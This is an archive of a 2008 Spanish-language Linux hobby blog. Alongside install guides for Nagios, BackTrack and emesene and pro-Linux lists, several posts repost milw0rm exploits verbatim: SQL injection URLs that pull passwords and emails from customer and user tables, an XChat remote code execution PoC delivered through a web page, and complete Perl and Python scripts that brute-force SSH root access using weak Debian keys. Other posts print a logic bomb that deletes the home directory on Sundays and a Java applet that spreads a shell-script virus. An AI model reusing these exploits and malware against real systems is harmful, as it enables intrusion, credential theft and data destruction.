The zerial killer --> de Gnu/Linux y mas....

NOS MUDAMOS!!!!!

2008-07-07T20:52:00.002-05:00

Hola a todos me he cambiado para www.zerialkiller.h4ck3rx.org

Nos vemos por alla XD .

Nagios en debian lenny

2008-07-04T19:06:00.002-05:00

Nagios es un sistema de código abierto de monitorización de redes, máquinas, servicios, sistemas, filesystems... .Es muy flexible ya que permite definir distintos tipos de alertas en función de la disponibilidad de los objetos monitorizados.

En este mi-ni tuto instalaremos la ultima versión de nagios, Versión 3.0.3. Para poder hacer funcionar nagios necesitamos tener instalado apache, en mi caso sera apache2 (yo lo tengo con soporte a php y a mysql pero creo que no es necesario tener eso solo con el apache es mas que suficiente) .

Si no tienes apache basta con teclear los siguiente.

#apt-get install apache2

ahora necesitamos el entorno de compilacion.

#apt-get install build-essential

Necesitaremos las siguientes librerías para la compilación de nagios

#apt-get install libjpeg62 libjpeg62-dev libpng12-0 libpng12-dev

Tambien necesitaremos las librerías gd2.

TODO LO QUE DESCARGEMOS LO GUARDAREMOS EN /tmp .

#cd /tmp
#wget -c http://www.libgd.org/releases/gd-2.0.35.tar.gz ---> descargamos gd2
#tar xzf gd-2.0.35.tar.gz ---> descomprimimos gd2
#cd gd-2.0.35 ---> accedemos al directorio de gd2

ahora el proceso de configuracion y compilacion.
#./configure
#make
#make install

ahora creamos los usuarios y grupos necesarios.

#useradd nagios ---> creamos el usuario nagios
#passwd nagios ---> password para nagios
#groupadd nagios ---> añadimos el grupo
#groupadd nagcmd ---> otro mas
#usermod -G nagios nagios
#usermod -G nagios tu_usuario
#usermod -G nagcmd nagios
#usermod -G nagcmd www-data

Ya tenemos los usuarios para Nagios, para el Apache y el nuestro propio para poder editar los ficheros de configuración.
Ahora a compilar y configurar nagios.

Descargamos nagios y sus Plugins de su pagina oficial y los guardamos en /tmp
Nagios ---> www.nagios.org

o tmb de sourceforge aquí les dejo los enlaces directos de la vercion 3.0.3 de nagios y de sus plugins.

Nagios 3.0.3

PLUGINS

PLUGINS

ahora bien accedemos al directorio donde las descargamos

#cd /tmp --> directorio en donde descargue nagios y plugins
#tar xzf nagios-3.0.3.tar.gz ---> descomprimimos nagios
# tar xzf nagios-plugins-1.4.12.tar.gz ---> descomprimimos los plugins

una ves descomprimidos los plugins y nagios pasaremos ala parte de compilación, primero entramos al directorio de nagios.

#cd nagios-3.0.3
#./configure --with-command-group=nagcmd
#make all
#make install
#make install-init
#make install-config
#make install-commandmode
#make install-webconf

ahora pasaremos al directorio de los plugins para su configuración.

#cd /tmp/nagios-plugins-1.4.12

#./configure --with-nagios-user=nagios --with-nagios-group=nagios
#make
#make install

ahora toca crear una contraseña para el usuario nagiosadmin y reiniciar el Apache.

#htpasswd -c /usr/local/nagios/etc/htpasswd.users nagiosadmin
#cd /etc/init.d/
#./apache2 restart

Arrancamos el Nagios.

#./nagios start

ahora abrimos nuestro navegador y tecleamos http://localhost/nagios/
deberá mostrarnos una ventana de login para el usuario de nagios y su respectiva contraseña, después de teclear el user y el pass correctamente accederemos a nagios.

Podemos crear un enlace para el arranque automático

#ln -s /etc/init.d/nagios /etc/rcS.d/S99nagios

aki una pantalla del buen Nagios.

10 razones de que Windows Vista es un buen sistema operativo

2008-07-02T13:01:00.002-05:00

WTF que PTM es esto °_° ¬¬ NO MAMEN .

Pondre el articulo tal y como lo encontre.

El sistema operativo Windows Vista ha recibido algunas críticas desde su lanzamiento hace más de un año. ¿Pero es realmente un sistema que "deja mucho que desear"?. El sitio Gizmodo presenta 10 razones que sugieren lo contrario.

Diario Ti: Con el fin de contrarrestar las opiniones en el sentido que Windows Vista sería un sistema operativo inconcluso y deficiente, el sitio Gizmodo ha publicado un análisis, con una lista de las 10 razones que convierten a Windows Vista en una buena opción.

1. Windows Vista es más seguro que Windows XP.
2. El interfaz de Windows Vista es mucho más atractivo que todas las versiones anteriores de Windows.
3. Windows Vista tiene una óptima capacidad de ejecución de juegos, muy similar a Windows XP.
4. El Media Center de Vista es excelente para la grabación de vídeo.
5. La función de suspensión de Windows Vista funciona “de maravillas".
6. La función User Account Control es altamente beneficiosa para “numerosos" usuarios.
7. El soporte para conectores es óptimo en Windows Vsta.
8. No hay más bugs (errores de código) en Windows Vista que en Windows XP.
9. Al contar con suficiente RAM, Windows Vista no es lento.
10. La función de búsqueda en el disco duro es óptima.

En todo caso, el autor del artículo no se muestra incondicionalmente positivo frente a Windows Vista. Hay varios puntos que le gustaría fuesen distintos. Por ejemplo, algunas conocidas funciones de Windows XP han sido cambiadas de lugar, lo que prolonga innecesariamente el tiempo de adaptación al software. Otro elemento que le causa molestia es la configuración de redes, que considera innecesariamente demorosa.

La argumentación completa puede ser vista en el sitio de Gizmodo (ver enlace).

Fuente : DiarioTI

JAAJJAAJ posiblemente tengan razon son 10 razones por las que guindous vista es "bueno", pero yo a gnu/linux le encuentro facil mas de 50 =)

MEME: Blogs

2008-07-01T19:29:00.005-05:00

Este es un Tipo de “meme” que vi en un sitio de por hay que trata sobre los blogs.

5 amigos cuyos blogs sin duda disfrutaría leer

1-http://gndx.org/
2-http://movimientolibre
3-http://fivenix.blogspot.com/
4-http://www.antoniomtz.org/
5-http://www.riveonline.com/

5 blogs que leería con placer morboso Y/O ociosos

1-http://www.socwall.com/
2-http://www.totallygeek.com/vscdb/index.php
3-http://linuxman.blogsome.com/
4-http://www.gnome-look.org/
5-http://art.gnome.org/

5 blogs que nunca leería

1-Uno sobre Lopez obrador
2-Uno sobre Porno Infantil
3-Uno sobre Putos -->Como el hiram y sus metroflogs
4-Uno sobre pokemon --> JAJA
5-Uno sobre Guindows --> JOJOJO

5 blogs recomendables (pues mas que nada son mis webs favoritas )

1-http://www.milw0rm.com/
2-http://packetstormsecurity.org/
3-http://www.remote-exploit.org/
4-http://www.securityfocus.com/
5-http://www.metasploit.com/

este meme se lo dejo a: GNDX Jmorales PAkO V. (cerillo) Antonio Martinez Rive bucio y a quien lo quiera contestar.

Remote SQL injection

2008-06-30T01:14:00.002-05:00

## AUTHOR : JuDge

## AUTHOR Email:spamm3r@windowslive.com,eslamwaheed50@hotmail.com

## Script WebSite:http://www.eshop100.co.uk

##Dork::)

##DescRipTiON: pull customers info from database

##EXPLOITS:
www.victim.com/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*

##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*

#AcmlmBoard v1.A2 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: "AcmlmBoard v1.A2"
#
##
###
##
#
#This Board Software suffers from some not correctly verified variables which are used in SQL Querys.
#An Attacker can easily get sensitive information from the database by
#injecting unexpected SQL Querys.
#
#SQL Injection:
#http://[target]/[path]/memberlist.php?sort=&pow=[SQL]
#
#PoC:
#memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16%20from%20users--+
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
#
#######################
#######################

video en YouTube, donde invita a descargar ilegalmente música

2008-06-28T12:48:00.001-05:00

Kid Rock ha publicado un video en YouTube, donde invita a descargar ilegalmente música - o en sus propias palabras, a robar música.
Como si lo anterior no fuera suficiente, luego exhorta al público a robar todo lo que se le antoje; automóviles, gasolina, música y películas. “Todo lo que necesites".

aqui al link: KID ROCK --> roba todo lo que puedas

Una Guia Linuxera, Para un Windolero

2008-06-27T11:19:00.002-05:00

Hola que tal, navegando ayer por el foro de elhacker me encontré esta guía para los novatos o como el titulo lo dice para un wuindulero =) bueno e aquí el link

Una Guia Linuxera, Para un Windolero

Como Instalar Back|Track 3

2008-06-23T02:12:00.004-05:00

Primero que nada tienes que tener lla echa una particion. Con 4 GB es mas que suficiente. Corremos el live cd de bactrac3 y abrimos una shell y comenzamos

bt~#mkdir /mnt/backtrack3 ---> creamos una carmeta dentro /mnt
bt~#mount /dev/sda10 /mnt/backtrack3/ --> montamos la particion donde queremos instalar /dev/sda10
bt~#mkdir /mnt/backtrack3/boot/ ---> creamos otro directorio
bt~#cp --preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/backtrack/ ---> instalamos tardara unos minutos

####----> despues de que termine con la instalacion terminamos con esto. -----------####

bt~#mkdir /mnt/backtrack3/{mnt,proc,sys,tmp}
bt~#mount --bind /dev/ /mnt/backtrack3/dev/
bt~#mount -t proc proc /mnt/backtrack3/proc/
bt~#cp /boot/vmlinuz /mnt/backtrack3/boot/

Para agregarlo al grub en mi cas solo edite el archivo menu.lst de mi debian.

bt ~ # fdisk -l

Disk /dev/sda: 60.0 GB, 60011642880 bytes
255 heads, 63 sectors/track, 7296 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes

Device Boot Start End Blocks Id System
/dev/sda1 * 1 34 273073+ 83 Linux
/dev/sda2 35 7296 58332015 5 Extended
/dev/sda5 35 642 4883728+ 83 Linux
/dev/sda6 643 1007 2931831 83 Linux
/dev/sda7 1008 1337 2650693+ 82 Linux swap
/dev/sda8 1338 1386 393561 83 Linux
/dev/sda9 1387 6019 37214541 83 Linux
/dev/sda10 6020 7296 10257471 83 Linux

Disk /dev/sdb: 123.5 GB, 123522416640 bytes
255 heads, 63 sectors/track, 15017 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes

Device Boot Start End Blocks Id System
/dev/sdb1 * 1 15017 120624021 7 HPFS/NTFS

como podran ver fue en la /dev/sda10 donde instale el back|track3
entonses:

Entre en el archivo menu.lst de debian y lo edite

#nano /boot/grub/menu.lst

title Back|track3
root (hd0,9)
kernel /boot/vmlinuz root=/dev/sda10 ro

con eso fue mas que suficiente para tener back|track3 en mi HD.

aqui el link para descargar BACK|TRACK3

Instalar emesene

2008-06-18T20:00:00.004-05:00

emsn es un cliente de mensageria similar al msn. la verdad en lo personal aun prefiero pidgin pero pues siempre hay mas altertativas que probar.

Primero editamos nuestro sources.list

#pico /etc/apt/sources.list

Y agregamos los repos.

deb http://apt.emesene.org/ ./
deb-src http://apt.emesene.org/ ./

haora.

#apt-get update

y haora instalamos.

#apt-get install emesene

Y listo.

Xchat <= 2.8.7b Remote Code Execution

2008-06-13T12:11:00.003-05:00

##################################################################################################################
#
# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched)
# Vendor : http://xchat.org/
# Affected Os : Windows *
# Risk : critical
#
# This bug is related to the URI Handler vulnerability but the approch is a bit different.
# We don't use any % or ../../../ as the others related bugs, just a single "
# According to the registry , when the IRCS:// URI is called , the command launched is :
# C:\Program Files\xchat\xchat.exe --existing --url="%1"
#
# The xchat --help option tells us :
# " --command=COMMAND :Send a command to existing xchat "
#
# So we add a simple " at the end of the URL and we're in business ?
# Yep =) ircs://blabla@3.3.3.3" --command "shell calc"
#
# Note: The victim needs to be connected to an irc server , and also need IE * .
#
#
#
# Greetz: French/Quebec community, http://spiritofhack.net/
#
# "If in times like theses you can talk about individual freedoom, you're propably a terrorist"
#
# Poc: this only launch the calc, sky is the limit passed this point.

html
head title Welcome to my personal website /title /head
body
script document.location='ircs://blabla@3.3.3.3" --command "shell calc"'/script
/body
/html

###http://www.milw0rm.com/#####

P2P =)

2008-06-11T00:10:00.002-05:00

Exploit SSH ---> OpenSSL

2008-06-02T15:42:00.001-05:00

dandome unas visitas por milworm encontre :

Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit

the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.

This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.

On an unpatched system, which doesn't need to be debian, do the following:

keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/

1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2

2. Extract it to a directory

3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian (this is the key this exploit will
break)

4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.

#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
print "By mm@deadbeef.de\n";
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}

5. Enjoy the shell after some minutes (less than 20 minutes)

Regards,
Markus Mueller
mm@deadbeef.de

# milw0rm.com [2008-05-15]

Y TAMBIEN

Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)

#!/bin/python
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
############################################################################
# Autor: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
#
# 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
# http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
#
# 2. Extract it to a directory
#
# 3. Execute the python script
# - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
# - execute: python exploit.py (without parameters) to display the help
# - if the key is found, the script shows something like that:
# Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
# Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
############################################################################

import Queue
import os
import string
import time
from threading import Thread
import sys

#This class only has a boolean, which will be True if some thread find the key
class End():
def __init__(self):
self.end = False

def Finish(self):
self.end = True

def GetEnd(self):
return self.end

#This is the thread class
class Connection(Thread):
def __init__(self,QueueDir,TheEnd,dir,host,user,port='22'):
Thread.__init__(self)
self.QueueDir = QueueDir
self.TheEnd = TheEnd
self.dir = dir
self.host = host
self.user = user
self.port = port

def run(self):
while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):
key = self.QueueDir.get()

cmd = 'ssh -l ' + self.user
cmd = cmd + ' -p ' + self.port
cmd = cmd + ' -o PasswordAuthentication=no'
cmd = cmd + ' -i ' + self.dir + '/' + key
cmd = cmd + ' ' + self.host + ' exit; echo $?'

pin,pout,perr = os.popen3(cmd, 'r')
pin.close()

#To debug descoment the next line. This will show the errors reported by ssh
#print perr.read()

if pout.read().lstrip().rstrip() == '0':
self.TheEnd.Finish()
print ''
print 'Key Found in file: '+ key
print 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host)
print ''

print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org'

if len(sys.argv) < 4:
print './exploit.py [[port] [threads]]'
print ' : Path to SSH privatekeys (ex. /home/john/keys) without final slash'
print ' : The victim host'
print ' : The user of the victim host'
print ' [port]: The SSH port of the victim host (default 22)'
print ' [threads]: Number of threads (default 4) Too big numer is bad'

sys.exit(1)

dir = sys.argv[1]
host = sys.argv[2]
user = sys.argv[3]

if len(sys.argv) <= 4:
port='22'
threads=4
else:
if len(sys.argv) <=5:
port=sys.argv[4]
threads = 4

else:
port=sys.argv[4]
threads = sys.argv[5]

ListDir = os.listdir(dir)
QueueDir=Queue.Queue()
TheEnd = End()

for i in range(len(ListDir)):
if ListDir[i].find('.pub') == -1:
QueueDir.put(ListDir[i])

initsize = QueueDir.qsize()
tested = 0

for i in range(0,int(threads)):
Connection(QueueDir,TheEnd,dir,host,user,port).start()

while (not TheEnd.GetEnd()) and (not QueueDir.empty()):
time.sleep(5)
actsize = QueueDir.qsize()
speed = (initsize - tested - actsize)/5
tested = initsize - actsize

print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed)

# milw0rm.com [2008-06-01]

Metagoofil

2008-05-31T16:08:00.002-05:00

Metagoofil es una Herramienta para obtener información de documentos públicos. Metagoofil nos ayuda a obtener una lista de usuarios, para poder realizar ataques de fuerza bruta sobre los servicios disponibles (FTP, VPN, Aplicaciones WEB, POP3).

Metagoofil es una herramienta que se encarga de extraer Meta-Data (Datos sobre los Datos), de ciertos ficheros accesibles en los webs del "objetivo".

Si Quieren saber como funciona cheken la web de Metagoofil

Bombas lógicas

2008-05-27T20:38:00.001-05:00

Las bombas lógicas son en cierta forma similares a los troyanos: se trata de código insertado en programas que parecen realizar cierta acción útil. Pero mientras que un troyano se ejecuta cada vez que se ejecuta el programa que lo contiene, una bomba lógica sólo se activa bajo ciertas condiciones, como una determinada fecha, la existencia de un fichero con un nombre dado, o el alcance de cierto número de ejecuciones del programa que contiene la bomba; así, una bomba lógica puede permanecer inactiva en el sistema durante mucho tiempo sin activarse y por tanto sin que nadie note un funcionamiento anómalo hasta que el daño producido por la bomba ya está hecho. Por ejemplo, imaginemos la misma situación que antes veíamos para el troyano: alguien con el suficiente privilegio renombra a vi como vi.old, y en el lugar del editor sitúa el siguiente código:

#!/bin/sh
if [ `date +%a` = "Sun" ];
then
rm -rf $HOME
else
vi.old $1
fi

Este cambio en el sistema puede permanecer durante años sin que se produzca un funcionamiento anómalo, siempre y cuando nadie edite ficheros un domingo; pero en el momento en que un usuario decida trabajar este día, la bomba lógica se va a activar y el directorio de este usuario será borrado.

Applets hostiles

2008-05-27T20:24:00.001-05:00

En los últimos años, con la proliferación de la web, Java y Javascript, una nueva forma de malware se ha hecho popular. estos instentan monopolizar o explotar los recursos del sistema de una forma inapropiada, esto incluye desde ataques clásicos como negaciones de servicio o ejecución remota de programas en la máquina cliente hasta amenazas mucho más elaboradas, como difusión de virus, ruptura lógica de cortafuegos o utilización de recursos remotos para grandes cálculos científicos.

Como ejemplo de applet hostil - aunque este en concreto no es muy peligroso - tenemos el siguiente código, obra de Mark D. LaDue (1996):

zkk:~/Security# cat Homer.java
import java.io.*;

class Homer {
public static void main (String[] argv) {
try {
String userHomer = System.getProperty("user.home");
String target = "$HOME";
FileOutputStream outer = new
FileOutputStream(userHome + "/.homer.sh");
String homer = "#!/bin/sh" + "\n" + "#-_" + "\n" +
"echo \"Java is safe, and UNIX viruses do not exist.\"" + "\n" +
"for file in `find " + target + " -type f -print`" + "\n" + "do" +
"\n" + " case \"`sed 1q $file`\" in" + "\n" +
" \"#!/bin/sh\" ) grep '#-_' $file > /dev/null" +
" || sed -n '/#-_/,$p' $0 >> $file" + "\n" +
" esac" + "\n" + "done" + "\n" +
"2>/dev/null";
byte[] buffer = new byte[homer.length()];
homer.getBytes(0, homer.length(), buffer, 0);
outer.write(buffer);
outer.close();
Process chmod = Runtime.getRuntime().exec("/usr/bin/chmod 777 " +
userHome + "/.homer.sh");
Process exec = Runtime.getRuntime().exec("/bin/sh " + userHome +
"/.homer.sh");
} catch (IOException ioe) {}
}
}
zkk:~/Security#

Este programa infecta los sistemas Unix con un virus que contamina ficheros shellscript; antes de hacerlo muestra el mensaje `Java is safe, and UNIX viruses do not exist', para después localizar todos los ficheros shell en el directorio $HOME, comprobar cuáles están infectados, e infectar los que no lo están.

Llegaron los discos de ubuntu =)

2008-05-21T14:31:00.002-05:00

Hoy me han llegado los discos de GNU/LINUX ubuntu para 64 y 32 bits, yo no utilizo esta distribución pero muchas personas que conozco si, adames de que las regalo para las personas que se van iniciando en esto que es el mundo de GNU/LINUX.

Todas las personas que quieran un disco solo hagan meló saber con gusto se las daré.

Mas de 25 razones de peso para migrar a GNU/Linux

2008-05-20T18:28:00.001-05:00

1 - Debido a que está licenciado bajo licencia GPL, GNU/Linux (así como todo el software libre) está disponible sin ningún coste. Puede ser descargado de Internet de forma gratuita, y puede ser adquirido en formato CD o DVD con un coste muy trivial. Una copia puede ser utilizada en tantos ordenadores como queramos sin restricciones. Si comparamos con Microsoft Windows, solo el sistema operativo nos costará por lo menos 100 € por ordenador.

2 - Debido a que es software libre, GNU/Linux también es gratuito en el sentido de que cualquiera está autorizado a modificar, incluso su código fuente, de cualquier forma deseada. Si las versiones modificadas no son re-distribuidas, los cambios pueden mantenerse en secreto. Esto también choca bastante con Microsoft Windows, ya que las modificaciones no están permitidas. El código fuente es la versión original de un programa tal y como lo haya escrito un programador usando un lenguaje de programación y antes de ser compilado de forma que sus instrucciones puedan ser entendidas directamente por un ordenador. Por lo tanto, es necesario tener el código fuente con el fin de poder realizar cambios en un determinado programa. Esta capacidad de experimentar con el código fuente, y hacerlo sin necesidad de dar a conocer las modificaciones a terceros ha sido muy importante para un gran numero de organizaciones.

3 - GNU/Linux cuenta con un soporte de alta calidad disponible de forma gratuita a través de Internet, en grupos de noticias y foros. Algunas personas afirman que este soporte es al menos tan bueno como en el software privativo, que además funciona, evidentemente, pagando. GNU/Linux puede adquirirse si se desea de forma comercial. Existen empresas que basan su negocio del software libre en negocio de servicios. Dan soporte de instalación de aplicaciones, parches para hacer frente a nuevas amenazas de seguridad y parches para arreglar bugs descubiertos recientemente. En GNU/Linux estos 2 últimos son relativamente infrecuentes...

4 - Hay muy pocas posibilidades de que el soporte técnico para algún sistema GNU/Linux se elimine porque el software haya quedado obsoleto o por cualquier otro motivo. Esto se debe a que el código fuente estará siempre disponible para cualquier persona que lo desee, incluidas aquellas personas que prestan dicho soporte de forma gratuita en Internet y también para aquellas empresas que basan su negocio en los servicios. Por el contrario Microsoft Windows, y otros programas privativos cuyo código fuente es mantenido en secreto, la obtención de soporte técnico se complica si la compañía que lo vende decide retirar el software con el fin de tratar de obligar al usuario a pagar por la nueva versión, por ejemplo.

5 - No existe ningún temor a que las aplicaciones se queden obsoletas con GNU/Linux. Esto se debe a que la arquitectura UNIX en la que se basan ha sido exhaustivamente probada y refinada durante más de 35 años y ha demostrado ser extremadamente eficaz, robusta y segura. Las mejoras se realizan a un ritmo rápido, pero las nuevas versiones siguen siendo compatibles con la arquitectura UNIX subyacente.

6 - No hay actualizaciones obligatorias para los usuarios de GNU/Linux. Esto se debe a que las versiones antiguas siguen siendo soportadas (por ejemplo, con el desarrollo de nuevos parches de seguridad y controladores de dispositivo) y porque las nuevas versiones, si así lo desean, están disponibles de forma gratuita y suelen ser compatibles con versiones anteriores. Los desarrolladores de software propietario, sin embargo, tienen fuertes incentivos financieros para planificar el que una determinada versión quede obsoleta. Su objetivo será inducir a los usuarios de versiones anteriores a gastar dinero para comprar o actualizar a las nuevas versiones.

7 - En caso de que un usuario decida actualizar a una versión más reciente de GNU/Linux, no hay derechos de licencia de software u otros gastos si el usuario selecciona una distribución libre. Por otra parte, la formación, modificaciones, adquisición de hardware y otros costos relacionados con una actualización a una nueva versión son también relativamente bajos debido a la compatibilidad con versiones anteriores.

8 - GNU/Linux no tiene complicados requisitos para hacer cumplir las licencias. En una empresa con cientos o miles de ordenadores, será necesario tener a un gran numero de personal solo para asegurarnos de que todos los ordenadores están cumpliendo con las complejas condiciones de autorización de uso (EULAs) para Microsoft Windows, Microsoft Office y otras aplicaciones propietarias. Con GNU/Linux no hay temor a auditorías sorpresa con posibles sanciones por violación de licencias.

9 - GNU/Linux es mucho más seguro con una muy baja tasa de infección por virus, troyanos, gusanos, software espía y otros códigos maliciosos. Esto se debe a que UNIX y todos sus descendientes (incluyendo GNU/Linux) fueron diseñados desde un principio con la seguridad en mente, en lugar de tratar de parchear graves fallos de seguridad cuando ys es demasiado tarde. Por ejemplo, los usuarios no habitúan a usar el sistema con permisos de administración, a fin de proteger los principales archivos del sistema. Incluso en el caso que la existencia de un código malicioso, este no poseería permisos suficientes para hacer mucho daño. Además un sólido firewall se incluye en las principales distribuciones y es activado por defecto. Otro factor a tener en cuenta es la libre disponibilidad del código fuente, lo que permite a miles de personas de todo el mundo poder buscar vulnerabilidades de seguridad.

10 - GNU/Linux es altamente resistente a los fallos de sistema y raramente necesita reiniciar. Esto puede ser muy importante para las grandes organizaciones para las que unos minutos de tiempo de inactividad puede suponer un coste sustancial. La razón es que GNU/Linux ha sido diseñado desde cero para ser un sistema operativo estable y robusto, incorporando todo lo aprendido en 35 años de historia de UNIX.

11 - Aunque el número y la variedad de programas para GNU/Linux aún no es tan grande como para el sistema operativo de Microsoft, ya existe una extensa selección y aumenta continuamente y cada vez más rápido a medida que más y más desarrolladores empiezan a crear programas para GNU/Linux. La mayoría de programas para GNU/Linux también son software libre y muchos de ellos tienen las mismas características y rinden igual o mejor que las ya existentes para Microsoft Windows. De hecho, los usuarios se encuentran a menudo con que todas las aplicaciones que necesitan están disponibles gratuitamente en Internet y que ya no necesitan comprar ningún software comercial.

12 - Existe una numerosa variedad de distribuciones GNU/Linux (varios cientos), cada una con su propio conjunto único de características, pero básicamente todas compatibles entre sí. Esto permite a los usuarios seleccionar las versiones que mejor respondan a sus necesidades específicas. También significa que si un distribuidor de GNU/Linux dejará de operar, todavía habría muchos otros para elegir. Por otra parte, fomenta una sana competencia entre ellas, contribuyendo así a la mejora continuada de la calidad y el rendimiento de GNU/Linux. La elección parece abrumadora pero por lo general es difícil cometer un error seleccionando una de las más populares, como Red Hat, Susu o Ubuntu.

13 - GNU/Linux cuenta con un alto grado de flexibilidad de configuración. Se puede lograr una alta personalización muy fácilmente y sin tener que modificar el código fuente. Es muy sencillo configurar GNU/Linux durante la instalación y optimizarlo para su uso como estación de trabajo, ordenador de escritorio, ordenador portátil, servidor web, servidor de base de datos, etc. Del mismo modo el aspecto y el comportamiento del escritorio, incluyendo iconos y menús puede ser configurado con un numero casi infinito de posibilidades y formas. Incluso puede hacerse parecido a Windows... Si esto no fuera suficiente, la capacidad de libre acceso al código fuente permite un grado de personalización "ilimitado".

14 - GNU/Linux utiliza formatos abiertos y estándares. Estos son aquellos que se ajustan a las normas de la industria y que pueden ser utilizados por cualquier desarrollador de software para crear programas compatibles. Es el caso de los formatos para el procesamiento de textos, hojas de calculo y otros tipos de archivos. En comparación con los formatos privativos (véase el formato DOC), el uso de estándares elimina el problema del apego a las normas privadas, con la consecuente dificultad y coste a la hora de cambiar a otro software en un futuro. El uso de formatos abiertos permite al usuario tener el control total de sus datos, en particular en el caso de que el vendedor de software decida dar por obsoleta la versión del programa, obligando al usuario a migrar todos sus datos a la nueva versión, previo pago, por supuesto...

15 - GNU/Linux es generalmente más rápido para un determinado conjunto de especificaciones de hardware. Esto es debido a una mayor optimización del código fuente.

16 - GNU/Linux cuenta con un alto grado de compatibilidad con otros sistemas operativos. Por ejemplo, se puede escribir, leer, copiar, borrar y manipular los datos existentes en una partición para Microsoft Windows, actuar como servidor para una red que contenga clientes en Windows, formatear discos duros para el uso con Windows, e incluso ejecutar los programas de Windows directamente si fuera necesario. En comparación, los sistemas operativos de Microsoft no pueden acceder a particiones de disco que contengan otros sistemas, no pueden formatear discos duros para otros sistemas, etc, etc...

17 - La ética y la moral se mantienen muy altas en el mundo GNU/Linux y en el resto del software libre debido a la gran apertura de su proceso de desarrollo y a la libre disponibilidad del código fuente. GNU/Linux nunca ha sido condenado en un tribunal por violación de leyes antimonopolio u otros delitos, ni ha tenido que pagar sanciones por la copia no autorizada de tecnología desarrollada por otras empresas. Las políticas gubernamentales antimonopolio regulan o rompen monopolios con el fin de promover la libre competencia. Los beneficios por alcanzar dicha competencia afectan a la economía y a la sociedad en su conjunto.

18 - GNU/Linux reduce la necesidad de actualizar o sustituir hardware cuando se actualiza a una nueva versión. Esto se debe a que su código fuente es muy eficiente y compacto, lo que permite que funcione en computadoras antiguas que no son adecuadas para las versiones más recientes de Microsft Windows.

19 - GNU/Linux es capaz de operar en una amplia variedad de plataformas y no solo se limita a equipos con procesadores Intel o AMD. Funciona perfectamente en una vasta variedad de equipos que van desde los superordenadores a los robots industriales, equipos médicos, teléfonos móviles (puede ejecutarse incluso en un reloj de pulsera)

20 - GNU/Linux es una mejor elección para su uso en las instituciones académicas por una serie de razones. Entre ellas se encuentra el hecho de que no hay secretos (en marcado contraste con el software privativo), con lo que los estudiantes tendrán la oportunidad de estudiar como funcionan realmente los ordenadores en lugar de simplemente aprender a usarlos. Muchos profesores están convencidos de que es mucho más importante aprender los fundamentos prácticos de la informática que aprender el uso de aplicaciones especificas (como Microsoft Word o Power Point). Una de las razones es que los fundamentos prácticos de la informática seguirán siendo validos después de muchos años, mientras que las aplicaciones (especialmente las propietarias) están en constante cambio y los conocimientos adquiridos quedarán obsoletos en pocos tiempo.

21 - Para los organismos gubernamentales, GNU/Linux permite la transparencia de los datos, ya que los almacena en formatos compatibles con toda la industria. Todo lo contrario al software comercial. Esta transparencia es importante para mantener una democracia efectiva. Esto permite a cualquier usuario acceder a los datos sin tener que comprar caros programas privativos. Por otra parte, mantenerlos en formatos estándar es mucho más seguro que hacerlo usando formatos propietarios.

